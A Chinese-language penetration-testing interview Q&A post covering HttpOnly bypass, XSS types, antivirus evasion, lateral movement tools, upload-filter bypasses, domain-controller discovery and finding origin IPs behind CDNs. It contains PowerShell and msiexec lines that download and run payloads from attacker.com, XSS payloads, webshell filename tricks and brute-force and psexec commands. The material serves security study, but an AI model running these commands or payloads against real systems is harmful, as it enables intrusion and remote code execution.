安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[二百四十一、XSS 设置Http-Only如何绕过](#二百四十一、XSS 设置Http-Only如何绕过)
二百四十一、xss 设置http-only如何绕过 二百四十二、xss攻击手段有哪些 二百四十三、遇到全是杀软的工作组怎么办 二百四十四、使用什么工具内网横向 二百四十五、fscan扫机器崩了怎么办 二百四十六、apache iis 解析漏洞是什么 二百四十七、php文件上传绕过方式(黑、白名单、解析漏洞) 二百四十八、工作组横向需要用户什么权限 二百四十九、如何查找域控(尽可能多的方式) 二百五十、如何从cdn 真实ip
二百四十一、XSS 设置Http-Only如何绕过
4类绕过技术:
浏览器漏洞利用
- 特定浏览器版本(如Chrome < v83)存在
Document.cookie
API绕过漏洞。跨域劫持(CORS滥用)
- 利用配置错误的
Access-Control-Allow-Origin: *
,通过XHR请求带凭证访问目标域:
javascript`fetch('https://target.com/data', {credentials: 'include'}).then(...)`
服务端请求伪造(SSRF+XSS组合)
- 通过XSS触发内网SSRF,间接获取含Cookie的响应(需存在SSRF漏洞)。
客户端缓存嗅探
- 读取浏览器缓存中未标记HttpOnly的敏感数据(如
localStorage
中的Token)。
二百四十二、XSS攻击手段分类
5大攻击类型及代表手法:
类型 原理 案例 反射型XSS 恶意脚本通过URL参数注入 http://site.com?search=<script>alert(1)</script>
存储型XSS 脚本持久化存储到数据库 评论区植入恶意JS,影响所有访问者 DOM型XSS 前端JS解析漏洞导致执行 eval(location.hash.slice(1))
盲打XSS 攻击后台管理界面 表单字段注入,等待管理员触发 mXSS HTML解析变异导致过滤失效 <img src="x" onerror=alert(1)>
被错误净化
二百四十三、高杀软覆盖工作组的渗透策略
免杀与隐蔽渗透方案:
无文件攻击
PowerShell内存加载:
powershell`IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1') `
合法工具滥用(LOLBAS)
使用微软签名的二进制文件执行操作:
cmd`msiexec /i http://attacker.com/payload.msi /quiet`
网络层隐蔽
- 使用ICMP/DNS隧道通信(工具:DNSCat2)。
进程注入
- 注入到可信进程(如
explorer.exe
)绕过内存扫描。硬件级后门
- 利用网卡固件漏洞(如Intel NIC)实现持久化。
二百四十四、内网横向工具选型
按场景匹配工具:
目标 推荐工具 关键参数 主机发现 arp-scan
,nmap -sn
--localnet
扫描本地网段服务爆破 Hydra
,Medusa
-L user.txt -P pass.txt smb://
票据传递 Impacket-psexec
-k -no-pass
使用Kerberos票据漏洞利用 Metasploit
,CobaltStrike
use exploit/windows/smb/psexec
隐蔽通信 CobaltStrike Beacon
HTTPS监听+SOCKS代理
二百四十五、fscan扫描崩溃处理
稳定性优化方案:
限制并发与超时
bash`./fscan -h 192.168.1.0/24 -t 64 -timeout 3 `
-t 64
:线程数≤64-timeout 3
:单主机超时3秒分片扫描
bash`split -l 100 targets.txt && for i in x*; do ./fscan -hf $i; done `
内存释放优化
- 使用
ulimit -v unlimited
解除内存限制。分布式扫描
- 将目标列表分割到多台VPS执行。
二百四十六、Apache/IIS解析漏洞
服务器解析漏洞详解:
服务器 漏洞版本 利用方式 Apache 1.x/2.x(配置错误) 上传 test.php.jpg
触发PHP执行IIS 6.0 Win2003 /shell.asp;.jpg
执行ASP代码IIS 7.0+ 配置FastCGI错误 上传 .php
文件改名为shell.jpg/.php
Nginx <0.8.37 shell.jpg%00.php
截断解析
二百四十七、PHP文件上传绕过
黑白名单对抗技术:
黑名单绕过
- 后缀大小写变形 :
Shell.PhP
- 双写后缀 :
shell.pphphp
→ 过滤后为shell.php
- 特殊后缀 :
.phtml
,.php5
,.phar
白名单绕过
%00截断 :
shell.jpg%00.php
(需PHP<5.3.4)路径拼接 :
php`move_uploaded_file($_FILES["file"]["tmp_name"], "/uploads/" . $_GET["dir"] . "/" . $filename);`
通过
?dir=shell.php%00
截断解析漏洞利用
- 结合Apache多后缀解析:
shell.php.xxx
→ 若.xxx
未定义,则向前识别为PHP
二百四十八、工作组横向权限要求
必需的最小权限:
- SMB协议
- 目标主机的本地管理员凭证(或SMB共享写入权限)。
- WMI执行
- 本地管理员权限 + 防火墙放行135/445端口。
- PsExec
- 管理员凭据 + ADMIN$共享访问权限。
- 计划任务
- 需加入本地管理员组(或Task Scheduler服务权限)。
二百四十九、域控定位方法大全
7种高效定位技术:
DNS查询
powershell`nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.com `
端口扫描
- 定位389(LDAP)/636(LDAPS)/88(Kerberos)端口开放主机。
NetBIOS信息
cmd`nbtstat -A 192.168.1.1 # 查找<1C>记录(域控制器) `
活动目录模块
powershell`Get-ADDomainController -Discover -Service PrimaryDC `
日志分析
- 事件ID 4662 (对象访问日志)中定位
CN=Domain Controllers
。SPN扫描
bash`setspn -T domain.com -Q */*`
默认组策略路径
\\domain.com\SYSVOL\domain.com\Policies
仅域控可写。
二百五十、CDN真实IP溯源
6层探测技术:
- 历史DNS记录
- 查询
securitytrails.com
获取历史A记录。- 子域名爆破
- 使用
amass
扫描未接入CDN的子域(如test.example.com
)。- SSL证书匹配
- 通过
crt.sh
搜索相同证书的IP。- 邮件服务器溯源
- 分析邮件头
Received
字段中的原始IP。- 协议漏洞探测
- 发送HTTP 1.0请求 或异常Host头 (如
Host: 127.0.0.1
)触发CDN转发错误。- 全球Ping监测
- 通过
viewdns.info
对比全球节点响应差异。